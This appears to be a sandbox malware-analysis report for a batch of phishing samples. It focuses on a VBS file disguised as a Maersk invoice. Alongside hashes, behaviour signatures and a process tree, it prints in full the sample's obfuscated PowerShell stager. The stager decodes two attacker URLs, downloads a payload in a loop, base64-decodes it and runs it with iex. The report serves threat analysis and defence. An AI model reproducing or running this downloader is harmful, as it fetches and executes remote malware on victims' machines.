Overview

overview

10

Static

static

5

0702/30.exe

windows7-x64

3

0702/30.exe

windows10-2004-x64

3

0702/710_S...FT.scr

windows7-x64

3

0702/710_S...FT.scr

windows10-2004-x64

3

0702/DHL A...LS.exe

windows7-x64

10

0702/DHL A...LS.exe

windows10-2004-x64

10

0702/FedEx...43.xls

windows7-x64

3

0702/FedEx...43.xls

windows10-2004-x64

1

0702/ISOTR...ry.scr

windows7-x64

3

0702/ISOTR...ry.scr

windows10-2004-x64

3

0702/KWOTASIE.exe

windows7-x64

8

0702/KWOTASIE.exe

windows10-2004-x64

8

0702/Maers...st.vbs

windows7-x64

8

0702/Maers...st.vbs

windows10-2004-x64

8

0702/MpClient.dll

windows7-x64

7

0702/MpClient.dll

windows10-2004-x64

7

0702/ORDER...024.js

windows7-x64

8

0702/ORDER...024.js

windows10-2004-x64

8

0702/PETUN...sx.scr

windows7-x64

10

0702/PETUN...sx.scr

windows10-2004-x64

10

0702/PO-24...890.js

windows7-x64

8

0702/PO-24...890.js

windows10-2004-x64

8

0702/Payme...1).vbs

windows7-x64

8

0702/Payme...1).vbs

windows10-2004-x64

8

0702/Payme...ts.vbs

windows7-x64

8

0702/Payme...ts.vbs

windows10-2004-x64

8

0702/QUOTA...DF.scr

windows7-x64

3

0702/QUOTA...DF.scr

windows10-2004-x64

3

0702/RFQ Q...00.exe

windows7-x64

5

0702/RFQ Q...00.exe

windows10-2004-x64

5

0702/Revis...93.vbs

windows7-x64

8

0702/Revis...93.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-11-2024 15:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0702/Maersk_BL_Invoice_Packinglist.vbs

  • Size

    26KB

  • MD5

    43fe0e9069047cb153a3e86508d5a6ca

  • SHA1

    bb5431130b0b3441b9eda1e54bad3f56eb49f04c

  • SHA256

    bcd66ce1c9d8d1123249ef8240a6e7ef32662aaa897845e866627ee69b28dff1

  • SHA512

    6816a9e7626d87afe7211780e6d3312e21400c165f4160149ad57bab61c504458fe133adf8d6467724fa2b148c2d762e4203b4b6d2e0630ad2f109c460827571

  • SSDEEP

    384:HlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgww779O7LWJRMv:FzSR022X/523S0e8xPPmE9VIFj3W+N

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 23 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0702\Maersk_BL_Invoice_Packinglist.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,a,lM:FS,iLmEclo.nS= $.t r uTe, ') ;Unopportunely $Narcotisation205;Unopportunely (toddyernes 'HS t aMrMtM-,SAl e,e p. L4V ');Unopportunely (toddyernes ' $ gNlNo,b a l :CF.oOrOh,jSuHl,sE=P(,TNe.sUtN-VP.aItchP $APLaSrVdAoTnLnPe rUeUn d eP)D ') ;Unopportunely (toddyernes 'S$PgSlHo.bSa.l :,N.o nNm e,t,aIl lAuKr,g i.c,a,l.l yS= $,gBlKo,b aIl.:RJ,eOnMdCaP+ +F%G$PS k,a l a t r i,n nTeDtBsL.Bc o u nAtS ') ;$Siddembler=$Skalatrinnets[$Nonmetallurgically];}$Morderskers=325186;$Horehuset=25649;Unopportunely (toddyernes ' $Ug l o bBaLl :.TWeNtFr.i csa lEn e sDs. =T CGSedt -RCOo,n t,eOn tO k$MP a rLdSo nIn eFrOe n.d eS ');Unopportunely (toddyernes 'T$sgUlSolbIa l,:CF,uDsSoEbDaTc the rQi aA V=, ,[ SMySsPt eUm .JC oBnTvBeIrstK]O: : F rEo m BIa s eB6,4ES.tSr iSn gD( $.TPe,tPrLi cHaDlHn,e s s ) ');Unopportunely (toddyernes 'f$HgRlSo b aKlT:ER.eLtPtre.rbs.tSe.dUe.t.sB N=. N[ SFyJsUtBe,mH.WTAeFx t .UE,n cEoSd.iPnRg.] :G:PAOS,CGIBIS.,G.e,t S,t rAi nDg ( $LF.u sSo bKaacHt,eUrFi a )D ');Unopportunely (toddyernes ',$Gg l.o bSa.lJ: MLaBk.u,l.efr e tc=,$ R e.t tpeEr s tDeNd eUtLsS.FsSu b s tRrBi n gW( $ MFoPr d e r s.k eArEs ,B$SHkoSrSe,hBuBs,e,t )V ');Unopportunely $Makuleret;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1648
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scabrosely.Tor && echo t"
        3⤵
          PID:4460

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bbepn4pv.fhv.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/1648-4-0x00007FFBFAAC3000-0x00007FFBFAAC5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1648-5-0x0000021E55A50000-0x0000021E55A72000-memory.dmp

      Filesize

      136KB

      Download

    • memory/1648-15-0x00007FFBFAAC0000-0x00007FFBFB581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1648-16-0x00007FFBFAAC0000-0x00007FFBFB581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1648-17-0x00007FFBFAAC0000-0x00007FFBFB581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1648-18-0x00007FFBFAAC3000-0x00007FFBFAAC5000-memory.dmp

      Filesize

      8KB

      Download

    • memory/1648-19-0x00007FFBFAAC0000-0x00007FFBFB581000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/1648-20-0x00007FFBFAAC0000-0x00007FFBFB581000-memory.dmp

      Filesize

      10.8MB

      Download